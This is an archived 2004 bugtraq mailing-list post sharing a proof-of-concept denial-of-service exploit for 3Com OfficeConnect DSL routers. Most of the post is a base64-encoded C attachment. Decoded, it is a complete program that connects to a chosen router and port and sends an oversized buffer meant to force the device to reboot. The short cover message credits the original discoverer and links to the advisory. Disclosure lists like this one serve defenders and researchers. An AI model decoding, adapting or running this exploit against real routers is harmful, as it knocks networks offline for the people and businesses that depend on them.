[33909] in bugtraq
3Com DSL Router Long Request DoS exploit.
daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Shaun=20Colley?=)
Mon Feb 23 16:33:44 2004
Message-ID: <20040222184855.36052.qmail@web25106.mail.ukl.yahoo.com>
Date: Sun, 22 Feb 2004 18:48:55 +0000 (GMT)
From: =?iso-8859-1?q?Shaun=20Colley?= <shaunige@yahoo.co.uk>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-431942027-1077475735=:35125"
Content-Transfer-Encoding: 8bit
--0-431942027-1077475735=:35125
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Id:
Content-Disposition: inline
I have attached a PoC exploit for the DoS
vulnerability on 3Com OfficeConnect DSL routers,
discovered by David F.Madrid.
(vulnerability documented here:
<http://www.securityfocus.com/bid/8248/>)
Thank you for your time.
Shaun.
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html
--0-431942027-1077475735=:35125
Content-Type: application/octet-stream; name="3com-DoS.c"
Content-Transfer-Encoding: base64
Content-Description: 3com-DoS.c
Content-Disposition: attachment; filename="3com-DoS.c"
LyogM2NvbS1Eb1MuYyAKICogCiAqIFBvQyBEb1MgZXhwbG9pdCBmb3IgM0Nv
bSBPZmZpY2VDb25uZWN0IERTTCBSb3V0ZXJzLiAgVGhpcyBQb0MgZXhwbG9p
dCB0aGUKICogdnVsbmVyYWJpbGl0eSBkb2N1bWVudGVkIGF0OiA8aHR0cDov
L3d3dy5zZWN1cml0eWZvY3VzLmNvbS9iaWQvODI0OD4sIAogKiBkaXNjb3Zl
cmVkIGJ5IERhdmlkIEYuIE1hZHJpZC4KICoKICogU3VjY2Vzc2Z1bCBleHBs
b2l0YXRpb24gb2YgdGhlIHZ1bG5lcmFiaWxpdHkgc2hvdWxkIGNhdXNlIHRo
ZSByb3V0ZXIgdG8KICogcmVib290LiAgSXQgaXMgbm90IGJlbGlldmVkIHRo
YXQgYXJiaXRyYXJ5IGNvZGUgZXhlY3V0aW9uIGlzIHBvc3NpYmxlIC0gCiAq
IGNoZWNrIGFkdmlzb3J5IGZvciBtb3JlIGluZm9ybWF0aW9uLgogKgogKiAt
c2hhdW4yazIKICovCiAKCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8
c3RkbGliLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN5
cy9zb2NrZXQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CiNpbmNsdWRlIDxuZXRp
bmV0L2luLmg+CgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKSB7
CglpZihhcmdjIDwgMykgewoJCXByaW50ZigiM0NvbSBPZmZpY2VDb25uZWN0
IERTTCBSb3V0ZXIgRG9TIGV4cGxvaXQgYnkgc2hhdW4yazIgLSA8c2hhdW5p
Z2VAeWFob28uY28udWs+XG5cbiIpOwoJCXByaW50ZigiVXNhZ2U6IDNjb21E
b1MgPDNjb21fcm91dGVyPiA8cG9ydD5cbiIpOwoJCWV4aXQoLTEpOwoJfQoK
CWludCBzb2NrOwoJY2hhciBleHBsYnVmWzUyMV07CglzdHJ1Y3Qgc29ja2Fk
ZHJfaW4gZGVzdDsKCXN0cnVjdCBob3N0ZW50ICpoZTsKCglpZigoaGUgPSBn
ZXRob3N0YnluYW1lKGFyZ3ZbMV0pKSA9PSBOVUxMKSB7CgkJcHJpbnRmKCJD
b3VsZG4ndCByZXNvbHZlICVzIVxuIiwgYXJndlsxXSk7CgkJZXhpdCgtMSk7
Cgl9CgoJaWYoKHNvY2sgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0s
IDApKSA9PSAtMSkgewoJCXBlcnJvcigic29ja2V0KCkiKTsKCQlleGl0KC0x
KTsKCX0KCglwcmludGYoIjNDb20gT2ZmaWNlQ29ubmVjdCBEU0wgUm91dGVy
IERvUyBleHBsb2l0IGJ5IHNoYXVuMmsyIC0gPHNoYXVuaWdlQHlhaG9vLmNv
LnVrPlxuXG4iKTsKCQoJZGVzdC5zaW5fYWRkciA9ICooKHN0cnVjdCBpbl9h
ZGRyICopaGUtPmhfYWRkcik7CglkZXN0LnNpbl9wb3J0ID0gaHRvbnMoYXRv
aShhcmd2WzJdKSk7CglkZXN0LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwoKCXBy
aW50ZigiWytdIENyYWZ0aW5nIGV4cGxvaXQgYnVmZmVyLlxuIik7CgltZW1z
ZXQoZXhwbGJ1ZiwgJ0EnLCA1MTIpOwoJbWVtY3B5KGV4cGxidWYrNTEyLCAi
XG5cblxuXG5cblxuXG5cbiIsIDgpOwoKCWlmKGNvbm5lY3Qoc29jaywgKHN0
cnVjdCBzb2NrYWRkciAqKSZkZXN0LCBzaXplb2Yoc3RydWN0IHNvY2thZGRy
KSkgPT0gLTEpIHsKCQlwZXJyb3IoImNvbm5lY3QoKSIpOwoJCWV4aXQoLTEp
OwoJfQoKCXByaW50ZigiWytdIENvbm5lY3RlZC4uLlNlbmRpbmcgZXhwbG9p
dCBidWZmZXIhXG4iKTsKCXNlbmQoc29jaywgZXhwbGJ1Ziwgc3RybGVuKGV4
cGxidWYpLCAwKTsKCXNsZWVwKDIpOwoJY2xvc2Uoc29jayk7CglwcmludGYo
IlxuWytdIEV4cGxvaXQgYnVmZmVyIHNlbnQhXG4iKTsKCXJldHVybigwKTsK
fQo=
--0-431942027-1077475735=:35125--
